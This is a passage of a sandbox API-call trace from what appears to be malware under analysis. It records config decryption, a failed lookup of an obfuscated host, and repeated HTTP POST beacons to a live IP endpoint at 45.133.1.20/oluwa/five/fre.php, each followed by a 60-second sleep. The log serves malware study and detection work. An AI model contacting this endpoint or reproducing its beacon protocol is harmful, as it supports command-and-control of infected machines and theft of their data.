(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.345] GetProcessHeap () returned 0x6a0000 [0199.345] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0199.345] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.345] GetProcessHeap () returned 0x6a0000 [0199.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0199.346] GetProcessHeap () returned 0x6a0000 [0199.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.346] GetProcessHeap () returned 0x6a0000 [0199.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0199.347] GetProcessHeap () returned 0x6a0000 [0199.347] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0199.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.352] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.380] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0199.389] GetProcessHeap () returned 0x6a0000 [0199.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0199.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.390] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0199.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.391] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.392] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.392] GetProcessHeap () returned 0x6a0000 [0199.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0199.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.406] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0199.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.418] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0199.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.419] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0199.419] GetProcessHeap () returned 0x6a0000 [0199.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.421] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0199.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.422] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0199.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.423] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0199.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.424] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0199.424] GetProcessHeap () returned 0x6a0000 [0199.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0199.424] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0199.424] GetProcessHeap () returned 0x6a0000 [0199.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0199.424] socket (af=2, type=1, protocol=6) returned 0x520 [0199.424] connect (s=0x520, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0199.450] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0199.450] GetProcessHeap () returned 0x6a0000 [0199.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0199.450] GetProcessHeap () returned 0x6a0000 [0199.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0199.451] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.452] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.452] GetProcessHeap () returned 0x6a0000 [0199.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0199.452] GetProcessHeap () returned 0x6a0000 [0199.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0199.453] GetProcessHeap () returned 0x6a0000 [0199.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0199.453] GetProcessHeap () returned 0x6a0000 [0199.453] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0199.454] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.455] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.455] GetProcessHeap () returned 0x6a0000 [0199.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0199.456] GetProcessHeap () returned 0x6a0000 [0199.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0199.458] send (s=0x520, buf=0x6b5c98*, len=242, flags=0) returned 242 [0199.459] send (s=0x520, buf=0x6bb998*, len=159, flags=0) returned 159 [0199.459] GetProcessHeap () returned 0x6a0000 [0199.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0199.460] recv (in: s=0x520, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0199.537] GetProcessHeap () returned 0x6a0000 [0199.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0199.537] GetProcessHeap () returned 0x6a0000 [0199.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0199.538] GetProcessHeap () returned 0x6a0000 [0199.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0199.538] GetProcessHeap () returned 0x6a0000 [0199.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0199.538] closesocket (s=0x520) returned 0 [0199.539] GetProcessHeap () returned 0x6a0000 [0199.539] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0199.539] GetProcessHeap () returned 0x6a0000 [0199.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.540] GetProcessHeap () returned 0x6a0000 [0199.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0199.541] GetProcessHeap () returned 0x6a0000 [0199.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0199.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfa0) returned 0x520 [0199.543] Sleep (dwMilliseconds=0xea60) [0199.548] GetProcessHeap () returned 0x6a0000 [0199.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0199.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.549] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.556] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0199.563] GetProcessHeap () returned 0x6a0000 [0199.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0199.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.565] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0199.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.566] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.569] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.569] GetProcessHeap () returned 0x6a0000 [0199.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0199.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.570] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0199.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.571] CryptDestroyKey (hKey=0x6ad020) returned 1 [0199.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.572] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0199.572] GetProcessHeap () returned 0x6a0000 [0199.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.573] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.574] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.577] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.577] GetProcessHeap () returned 0x6a0000 [0199.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0199.577] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.584] GetProcessHeap () returned 0x6a0000 [0199.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0199.585] GetProcessHeap () returned 0x6a0000 [0199.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.585] GetProcessHeap () returned 0x6a0000 [0199.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0199.585] GetProcessHeap () returned 0x6a0000 [0199.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0199.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0199.605] GetProcessHeap () returned 0x6a0000 [0199.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0199.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.606] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0199.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.608] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.609] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.609] GetProcessHeap () returned 0x6a0000 [0199.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0199.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.614] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0199.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.616] CryptDestroyKey (hKey=0x6ad020) returned 1 [0199.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.617] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0199.617] GetProcessHeap () returned 0x6a0000 [0199.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.618] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0199.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.620] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0199.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.621] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0199.625] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.625] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0199.625] GetProcessHeap () returned 0x6a0000 [0199.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0199.625] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0199.625] GetProcessHeap () returned 0x6a0000 [0199.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0199.625] socket (af=2, type=1, protocol=6) returned 0x524 [0199.626] connect (s=0x524, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0199.654] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0199.654] GetProcessHeap () returned 0x6a0000 [0199.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0199.654] GetProcessHeap () returned 0x6a0000 [0199.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0199.656] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.657] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0199.657] GetProcessHeap () returned 0x6a0000 [0199.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0199.658] GetProcessHeap () returned 0x6a0000 [0199.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0199.658] GetProcessHeap () returned 0x6a0000 [0199.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0199.658] GetProcessHeap () returned 0x6a0000 [0199.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0199.659] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0199.660] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0199.660] GetProcessHeap () returned 0x6a0000 [0199.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0199.660] GetProcessHeap () returned 0x6a0000 [0199.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0199.661] send (s=0x524, buf=0x6b5c98*, len=242, flags=0) returned 242 [0199.661] send (s=0x524, buf=0x6bb998*, len=159, flags=0) returned 159 [0199.662] GetProcessHeap () returned 0x6a0000 [0199.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0199.662] recv (in: s=0x524, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0199.739] GetProcessHeap () returned 0x6a0000 [0199.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0199.740] GetProcessHeap () returned 0x6a0000 [0199.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0199.741] GetProcessHeap () returned 0x6a0000 [0199.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0199.742] GetProcessHeap () returned 0x6a0000 [0199.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0199.742] closesocket (s=0x524) returned 0 [0199.743] GetProcessHeap () returned 0x6a0000 [0199.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0199.743] GetProcessHeap () returned 0x6a0000 [0199.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0199.743] GetProcessHeap () returned 0x6a0000 [0199.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0199.744] GetProcessHeap () returned 0x6a0000 [0199.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0199.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x184) returned 0x524 [0199.746] Sleep (dwMilliseconds=0xea60) [0199.748] GetProcessHeap () returned 0x6a0000 [0199.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0199.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.749] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0199.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.757] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0199.766] GetProcessHeap () returned 0x6a0000 [0199.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5c58 [0199.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.768] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c5c58, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0199.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.770] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0199.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.771] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0199.771] GetProcessHeap () returned 0x6a0000 [0199.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5c58 | out: hHeap=0x6a0000) returned 1 [0199.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.772] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0199.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.774] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0199.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0199.775] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0199.775] GetProcessHeap () returned 0x6a0000 [0199.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0199.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.780] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0199.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.781] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0199.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.782] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0199.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0199.784] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0199.784] GetProcessHeap () returned 0x6a0000 [0199.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0199.784] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0199.784] GetProcessHeap () returned 0x6a0000 [0199.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 